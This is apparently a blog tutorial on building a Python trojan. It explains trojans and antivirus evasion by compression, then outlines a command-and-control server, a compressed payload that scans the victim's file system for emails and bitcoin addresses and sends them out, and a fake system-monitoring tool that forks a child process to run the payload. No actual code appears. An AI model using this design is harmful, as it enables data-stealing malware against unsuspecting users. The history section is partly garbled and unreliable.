Creating a Basic Trojan in Python
Recently a friend sent me a link to Hacktoberfest — a month long challenge in October where participants must make for contributions to opensource repositories on GitHub or GitLab. The first 40,000 participants to complete the challenge get a free tee-shirt. I thought this was the perfect opportunity to not only contribute to existing open source repositories (I chose pythonping) but to make an open source python package of my own. Due to my interest in cyber security I decided on creating a package that would help users make Worms on there own. I know what you are thinking… what an amazing contribution to society — I am so glad you think the same (sarcasm intended). I took some time today to learn about how trojans were created and wanted to walk you through my learning. What we will be building today is a benign program allowing you to understand how Trojans function.
What Are Trojans
A trojan is a piece of malicious software masking as benign, tricking the user into downloading, and running it. Sometimes these programs may be self replicating and can be designed to spread across networks as worms do (but not always). The first trojan, called creeper, was created in 1971 and was a self replicating program that spread across networks simply printing the words “I am the creeper, catch me if you can”, and was described in John von Neumann’s paper titled “The theory of self replicating automata” five years prior. Many various and significantly more destructive Trojans exist today.
Antivirus Evasion
In order to avoid detection by antivirus software which analyses viruses for patterns in code and sometimes compare them to a predefined list of signatures, Trojans obfuscate there code in various ways including encrypting, compressing, or introducing spaghetti login into the code to name a few methods . We will be working with a compressed malicious piece of code today.
The Actual Coding
Our project will rely on a command and control server to receive data, a compressed piece of malicious code to exfiltrate data and a main file that mascarades as a system monitoring tool.
Command and Control Server
The command and control server is a relatively trivial piece of code, simply opening a socket, listening for data, and writing to a file with a random name. Because this type of socket programing was covered in a previous tutorial I wrote on this blog you can simply check out the completed code here.
Malicious Code
Our malicious code will take five steps as follows:
- Open a socket.
- Get it’s IP through IPAPI.com
- Use regex to scan the file system for emails and bitcoin addresses.
- Format the addresses using JSON & encode it.
- Sent the data to our command and control server.
Upon completion this file must be zipped and it’s signature saved. The tricky part of this is of course the regex which takes some creativity, but the rest can be figured out simply using documentation. The code itself is relatively straight forward and looks like this:
Main File
The main file is a little tricky and requires use of forking. The principal behind the main file is simple, as it must execute it;s “legitimate functionality” while initiating a process to do the malicious stuff. While the parent process executes the “official” functionality, the child process will decompress the malicious file and execute it. Those of you who studied C programing in university will find this straight forward, but others may need to do some research.
Putting it all together
Once you have written all the code, simply run the command and control server followed the main file. You should see some data coming in. The process itself is relatively simple, programmatically speaking, but brings some cool new ideas and topics to light.
You can find the Open Source Repository I am building on my GitHub profile.
For the original tutorial look here:
